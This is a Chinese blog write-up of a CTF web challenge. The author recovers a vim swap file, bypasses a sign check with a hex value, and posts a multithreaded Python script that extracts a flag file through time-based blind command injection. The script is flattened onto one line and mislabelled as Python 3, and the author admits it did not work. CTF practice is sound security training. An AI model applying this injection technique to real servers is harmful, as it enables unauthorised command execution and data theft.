i春秋 “百度杯”CTF比賽 十月場 Exec
阿新 • • 發佈:2018-11-10
https://www.ichunqiu.com/battalion?t=1&r=0
進入題目連結,是一隻貓咪
檢視網頁原始碼:
<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
no sign
得到提示:vim
很容易聯想到vim編輯器的臨時交換檔案,嘗試/.index.php.swo,順利下載到檔案
vim -r index,php.swo
使用十六進位制形式繞過sign引數的檢查,他給的那個數字其實就是16進位制的0xabcdef
後面的步驟可以使用個人的vps去做,但是我沒有,參考網上的時間盲注也做不出來,無奈,只能現在放在這兒了
時間盲注程式碼如下:(使用了python3多執行緒)
import requests,string,threading def getLength(url,payload): data = {} length = 0 for i in xrange(200): data['cmd']="a=$(%s);b=${#a};if test $b -eq %d;then sleep 3;fi"%(payload,i) try: r = requests.post(url,data=data,timeout=3) except: length = i print "the string length is {}".format(length) break return length def getString(url,payload): global length,lock,curId,key data = {} words = string.uppercase+string.lowercase+string.digits+'/=+' i = 0 while True: lock.acquire() if curId == length: lock.release() break i = curId curId += 1 lock.release() for j in words: data['cmd']="a=$({});b=`expr substr $a {} 1`;if test $b = '{}';then sleep 8;fi".format(payload,i+1,j) try: r = requests.post(url,data=data,timeout=8) except: key[i] = j lock.acquire() print ''.join(key) lock.release() break url = 'http://238de0378b514fc78acefac7676fefd36250b17a68494529.game.ichunqiu.com/index.php?sign=0xabcdef' payload = "base64 flag233.php -w 0" length = getLength(url,payload) lock = threading.Lock() curId = 0 #max(curId) = length - 1 key = ['?' for i in xrange(length)] th=[] for i in xrange(10): t = threading.Thread(target=getString,args=(url,payload)) th.append(t) for t in th: t.start() for t in th: t.join()